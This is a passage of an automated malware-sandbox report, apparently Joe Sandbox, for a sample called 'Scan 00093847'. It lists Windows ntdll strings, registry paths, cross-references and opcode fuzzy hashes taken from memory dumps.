                                            • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 010E1028
                                            • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 010E0FE5
                                            • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 010E10AE
                                            • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 010E106B
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                            • API String ID: 0-336120773
                                            Strings
                                            • apphelp.dll, xrefs: 010A2462
                                            • LdrpDynamicShimModule, xrefs: 010EA998
                                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 010EA992
                                            • minkernel\ntdll\ldrinit.c, xrefs: 010EA9A2
                                            Similarity
                                            • API ID:
                                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-176724104
                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                            • API String ID: 0-1391187441
                                            Strings
                                            • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 01081728
                                            • HEAP[%wZ]: , xrefs: 01081712
                                            • HEAP: , xrefs: 01081596
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                            • API String ID: 0-3178619729
                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: FilterFullPath$UseFilter$\??\
                                            • API String ID: 0-2779062949
                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                            • API String ID: 0-373624363
                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: %$&$@
                                            • API String ID: 0-1537733988
                                            Strings
                                            • minkernel\ntdll\ldrmap.c, xrefs: 010EA59A
                                            • Could not validate the crypto signature for DLL %wZ, xrefs: 010EA589
                                            • LdrpCompleteMapModule, xrefs: 010EA590
                                            Similarity
                                            • API ID:
                                            • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                            • API String ID: 0-1676968949
                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                            • API String ID: 0-1151232445
                                            Strings
                                            • @, xrefs: 0113C1F1
                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0113C1C5
                                            • PreferredUILanguages, xrefs: 0113C212
                                            Similarity
                                            • API ID:
                                            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                            • API String ID: 0-2968386058
                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                            • API String ID: 0-1373925480
                                            Strings
                                            • RtlCreateActivationContext, xrefs: 010F29F9
                                            • Actx , xrefs: 010B33AC
                                            • SXS: %s() passed the empty activation context data, xrefs: 010F29FE
                                            Similarity
                                            • API ID:
                                            • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                            • API String ID: 0-859632880
                                            Strings
                                            • GlobalFlag, xrefs: 0110B68F
                                            • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 0110B632
                                            • @, xrefs: 0110B670
                                            Similarity
                                            • API ID:
                                            • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                            • API String ID: 0-4192008846
                                            Strings
                                            • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 010C127B
                                            • BuildLabEx, xrefs: 010C130F
                                            • @, xrefs: 010C12A5
                                            Similarity
                                            • API ID:
                                            • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                            • API String ID: 0-3051831665
                                            Strings
                                            • Process initialization failed with status 0x%08lx, xrefs: 011020F3
                                            • LdrpInitializationFailure, xrefs: 011020FA
                                            • minkernel\ntdll\ldrinit.c, xrefs: 01102104
                                            Similarity
                                            • API ID:
                                            • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-2986994758
                                            APIs
                                            Strings
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: #%u
                                            • API String ID: 48624451-232158463
                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: @$@
                                            • API String ID: 0-149943524
                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: `$`
                                            • API String ID: 0-197956300
                                            Strings
                                            • RtlpResUltimateFallbackInfo Exit, xrefs: 0108A309
                                            • RtlpResUltimateFallbackInfo Enter, xrefs: 0108A2FB
                                            Similarity
                                            • API ID:
                                            • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                            • API String ID: 0-2876891731
                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                            • API String ID: 0-118005554
                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: .Local\$@
                                            • API String ID: 0-380025441
                                            Strings
                                            • RtlpInitializeAssemblyStorageMap, xrefs: 010F2A90
                                            • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 010F2A95
                                            Similarity
                                            • API ID:
                                            • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                            • API String ID: 0-2653619699
                                            Strings
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: Cleanup Group$Threadpool!
                                            • API String ID: 2994545307-4008356553
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4a818c232ea97b997773250437b40a7218541ed2d82ae149432dfb322696aee7
                                            • Instruction ID: 0dbd7f7c3a10117234387ced5260e24a0984ee488ff261e727d21160a126f535
                                            • Opcode Fuzzy Hash: 4a818c232ea97b997773250437b40a7218541ed2d82ae149432dfb322696aee7
                                            • Instruction Fuzzy Hash: B7A18A71608742CFC365EF28C480A2ABBF5BF98304F24496EE5D58B355EB70E945CB92
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PreferredUILanguages
                                            • API String ID: 0-1884656846
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: kLsE
                                            • API String ID: 0-3058123920
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: #
                                            • API String ID: 0-1885708031
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Actx
                                            • API String ID: 0-89312691
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrCreateEnclave
                                            • API String ID: 0-3262589265
                                            • Instruction ID: 1e72618830bd777e009b3ca4937161ac811ca97c7a62dcffb7af11440469adeb
                                            • Opcode Fuzzy Hash: 0409d5a60586090319dbc581475fae94a87cb35f7a33454fabe7087efe817291
                                            • Instruction Fuzzy Hash: 7661D27120461AAFD71DDF68C884FABBBA9FF88B18F008619F95897240DB30E501CBD1
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: da75747332d7f5cb3e136b4a88cbfca45e65c15075a8ec001524269cf171576c
                                            • Instruction ID: 3bb7045e23e21cc62071b7eb10f28fe3df29db562851b19be60510f530e3e881
                                            • Opcode Fuzzy Hash: da75747332d7f5cb3e136b4a88cbfca45e65c15075a8ec001524269cf171576c
                                            • Instruction Fuzzy Hash: E86127712087468BE71DCF68C494BABBBE0BF99B1CF19446CE9958B281D735E805CB81
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 20894c5a31de3fc20b0bbbd6a19cdafa91e8d6ae634b2ab83a24b74292cae5e3
                                            • Instruction ID: 6e4990a519c3fc823815ad8eb237b66735f49ddf4113513bd758c3b0bd52fb7c
                                            • Opcode Fuzzy Hash: 20894c5a31de3fc20b0bbbd6a19cdafa91e8d6ae634b2ab83a24b74292cae5e3
                                            • Instruction Fuzzy Hash: 98414671A40701AFDB2A9F29D980BAABBF5FF44720F108469E999DB351DB30DC40CB94
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cd0f7ea526af01b88e08b36dcf379f99f55923f4a7f7169a8ac0b6e7026bc6c1
                                            • Instruction ID: 86e592131a82503b5978857f7e3ecf2f91e4a4600d4b2a944e0e42332bc63302
                                            • Opcode Fuzzy Hash: cd0f7ea526af01b88e08b36dcf379f99f55923f4a7f7169a8ac0b6e7026bc6c1
                                            • Instruction Fuzzy Hash: 5451A4712042469FE724FF64C881FAE7BE8EB55724F10063DEAA197691DB34E841CB62
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 421d61e5bc4c825cfb3b344d513b1230fd482de7481e25e13c6dc44851e8f620
                                            • Instruction ID: 6d2c26826b079c4c00a568ff29c045d24f2108a6ee01d5255019ef6ecf95916d
                                            • Opcode Fuzzy Hash: 421d61e5bc4c825cfb3b344d513b1230fd482de7481e25e13c6dc44851e8f620
                                            • Instruction Fuzzy Hash: 7351D0762003429BCB11AFA88C42ABB7BE5FF98640F14046DFBC58B651F735C856D7A2
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7e389d178807715bce1de88bd6e03c3881672f2f14e7d4755d8ad6fa548b5ea4
                                            • Instruction ID: 4381e20800b1ccd3ed491af8de6a7f9ecc30efd2e0a158357118ca2384e0c848
                                            • Opcode Fuzzy Hash: 7e389d178807715bce1de88bd6e03c3881672f2f14e7d4755d8ad6fa548b5ea4
                                            • Instruction Fuzzy Hash: BA515A70A0020EAEEB219FA5C881BEDBBF4FF05744F60416AA5D4A7191DB719854DF10
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e328f1dbea2031a0ec3edd323bbdcba0358b4699dcd557c3f9995e90865a5568
                                            • Instruction ID: e76b636b316868d886e71cac656d906552a5489571750ac41376ce423f3a615e
                                            • Opcode Fuzzy Hash: e328f1dbea2031a0ec3edd323bbdcba0358b4699dcd557c3f9995e90865a5568
                                            • Instruction Fuzzy Hash: 24513631A08606EFEF16EF68C848BADBBF5FF54715F2040A9E4D293690DB709901CB90
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1e7aa68f2313c6845b79d29bb7e80048ab92f4a028c026fdf616fd5856ec685b
                                            • Instruction ID: 8d473e1e78f714d0489163a84db8e4256b9250131e1ca2ceced1ef7c8c8fa98c
                                            • Opcode Fuzzy Hash: 1e7aa68f2313c6845b79d29bb7e80048ab92f4a028c026fdf616fd5856ec685b
                                            • Instruction Fuzzy Hash: E0514871200A499FCB62EF69C9D0EEAB3F9FF14784F400469E69697660DB34E940CB50
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                            • Instruction ID: dd9ae5344e55755c53ef42066300323c417581c3183800fc1051e6dc2d31e81a
                                            • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                            • Instruction Fuzzy Hash: 09518C79E0024AABDF15DB98C840BEEBBF5BF48350F484069EA81EB240D774DD44CBA0
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                            • Instruction ID: 112e75ef0478f67c882a6557b52118d3dcc0bf79fc88eaa574210522b28fc3d4
                                            • Opcode Fuzzy Hash: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                            • Instruction Fuzzy Hash: AF518E716083429FDB19CF68D884B9ABBE5FFD8754F08892DF99487280D734E905CB52
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 446535427233b345160e977b78943245d79fdc67c549633877bca2131af94bc4
                                            • Instruction ID: 51d4eaa716c13f6dcb997d1cd05e5e4f13617b39b58ef01e4b8e19198dfa8fd0
                                            • Opcode Fuzzy Hash: 446535427233b345160e977b78943245d79fdc67c549633877bca2131af94bc4
                                            • Instruction Fuzzy Hash: 00518C71B09616DFEF62AAA8CC40BEDB7F4BF18314F048068E8D1A7241DBB49940CB51
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
                                            • Instruction ID: 8bfe064119b60472637fe08ddab862dc46d0f874aa1254d9b9a449c39e8d60b5
                                            • Opcode Fuzzy Hash: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
                                            • Instruction Fuzzy Hash: 80519071600606DFCB5ACF14C580A96FBB5FF45344F15C0AAE9189F222E371EA85CFA0
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 192a418e5a5ab59a6c7fae25537085f52d6e6048885e942a6884c9a1bfead6ab
                                            • Instruction ID: 1d601ce0aea549c96abf11fccee889a7396de15f3be0524eeba4b97597d864a6
                                            • Opcode Fuzzy Hash: 192a418e5a5ab59a6c7fae25537085f52d6e6048885e942a6884c9a1bfead6ab
                                            • Instruction Fuzzy Hash: FF41DC31A01219DBDB14DF98C480AEFBBB5BF48B00F1481AAF999F7244E7359D45CBA4
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fa684833ef4d602b3f1dfb3d06fbc7aaeb167543f996685d981b5bd049bdc6ac
                                            • Instruction ID: cccae671eee24200c5c8566e6a048f7a287a68e9d8f4e2c8377920338ba1a31c
                                            • Opcode Fuzzy Hash: fa684833ef4d602b3f1dfb3d06fbc7aaeb167543f996685d981b5bd049bdc6ac
                                            • Instruction Fuzzy Hash: CE519B32608691CFD722EB5DC448B6A7BE5BB44754F0906A6F8C1CF691DB34DC40CBA1
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                            • Instruction ID: b34fa4a557e3ef49b87f7e92fc456c463d23b5daa5bcbcf85c0ff7de3617fbe3
                                            • Opcode Fuzzy Hash: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                            • Instruction Fuzzy Hash: 49512875A00205DFDB58CFA8C482699BBF1FF58314B14C1AED95997745D334EA80CF90
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2db7b2751a678c9151427cb3489b8df6ce113ce024ddf345665887f4ebd3dab9
                                            • Instruction ID: 662f95352b62678dcabdd692732675a23f87d3241ac11680769e3457974c79a5
                                            • Opcode Fuzzy Hash: 2db7b2751a678c9151427cb3489b8df6ce113ce024ddf345665887f4ebd3dab9
                                            • Instruction Fuzzy Hash: 1051E470A04A06DFEB65AB28CC14BE8BBF1EB11314F0582E5E5E9A73D1DB759981CF40
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 883c38350bb685520047581e6a129ce4e7ee2f33f13f4058a8d3fcb94c729e28
                                            • Instruction ID: 1f3f0c4081773c5e5370668aef7550b304689903ebe07148b12c6d57d903672b
                                            • Opcode Fuzzy Hash: 883c38350bb685520047581e6a129ce4e7ee2f33f13f4058a8d3fcb94c729e28
                                            • Instruction Fuzzy Hash: 7241B0B1A41706EFEB26AF69C980BAABBF8FF10794F008469E595DB250D770D841CF50
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2c3cf79b78f754b38eb50d3618620514704a416db2d81a19adcde7f8390992eb
                                            • Instruction ID: 1c0bec5d6de3c5ef97a4aaecb471d7906c9166e99890f2bb60aecf17eda5bf96
                                            • Opcode Fuzzy Hash: 2c3cf79b78f754b38eb50d3618620514704a416db2d81a19adcde7f8390992eb
                                            • Instruction Fuzzy Hash: 1D419E31A45209CFDB25DFACC4547ED7BF0BB58350F4401A9D4A1AB2D1DB349980CBA5
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                            • Instruction ID: ab6b045f3613128f319aeb3b7b51925f2ad561a22f8ca262287168a1eaa9032b
                                            • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                            • Instruction Fuzzy Hash: D4412731F00311DBEB62DE6984407FEBBA1EB51764F1A84EAF9C58B240D6329D80CBD4
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6681215de59e44966639a0ff9d89daa5b807c130a42921be8368e10b59b8453f
                                            • Instruction ID: 8aa6f1aeb55a24096d72b574122ef4a8759b4ff5c12e03cbb1378b19bfcd5dac
                                            • Opcode Fuzzy Hash: 6681215de59e44966639a0ff9d89daa5b807c130a42921be8368e10b59b8453f
                                            • Instruction Fuzzy Hash: 5741E372A046469FC325DF68CC50BAAB7E5FFC8740F14462DF9948B680E770E904CBA6
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                            • Instruction ID: 947887ab229d66f7bf740b5c592d3c8d16fad31f2259e5e9d9f5389796a98961
                                            • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                            • Instruction Fuzzy Hash: 2E31E031A04249AFDF629B69CC44BDEBBEDAF14350F04C1A6F899D7256C7749884CBA0
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 50aa6c9e0cf5cc9ac6bb10b34254812546c4b6a72db194ded57a3011498dc328
                                            • Instruction ID: e89a093a90a7508b596d8c738567d82257e53b6fa50c0341d8140aa5e0db3fa3
                                            • Opcode Fuzzy Hash: 50aa6c9e0cf5cc9ac6bb10b34254812546c4b6a72db194ded57a3011498dc328
                                            • Instruction Fuzzy Hash: 2A31B576B0062DAFDB25CBA8CC40B9EBBB5EF85714F4041D9A58CA7280DB319D84CF51
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 074bab067f1426189280999e5d617c2a8a3b96435e2ef5259ec2c73e6a00b36a
                                            • Instruction ID: 3db03d3d63a13d049aef329aa8604dd96be65c1459993aec063eab0e7af10283
                                            • Opcode Fuzzy Hash: 074bab067f1426189280999e5d617c2a8a3b96435e2ef5259ec2c73e6a00b36a
                                            • Instruction Fuzzy Hash: 9041BD71204B46DFD766DF29C884BDA7BE5AB58314F00846DFAD9CB250C7B4E804CB50
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                            • Instruction ID: fcfee4780c6a01b3571eaf537373ea152dd48abad1a6716245319be0083deea5
                                            • Opcode Fuzzy Hash: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                            • Instruction Fuzzy Hash: F53106316083429FEB61DAADCC00B7BBBD5BB85750F8981AAF9C5CB391D274D841C792
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6f565a452c6f298849ba1a261415cbe5f64e5d486ec93bd708774d2c5ab32586
                                            • Instruction ID: a585c9a91e0c72ace3ff137b1fb75a4a2a413292756937f53525d06873bbd629
                                            • Opcode Fuzzy Hash: 6f565a452c6f298849ba1a261415cbe5f64e5d486ec93bd708774d2c5ab32586
                                            • Instruction Fuzzy Hash: 2E312472901208AFC721DF18C840AAA7BF5FF44364F1442A9ED958B291DB31ED42CBD4
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            • Opcode Fuzzy Hash: 4b269e202d3758574c6d84d794a81783832a8ca9551c8acae8dc9149e2c486af
                                            • Instruction Fuzzy Hash: A311A070505229ABEB65EB64CC42FEC73B4BF04710F5041D8B398A60E0DB709E81CF84
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
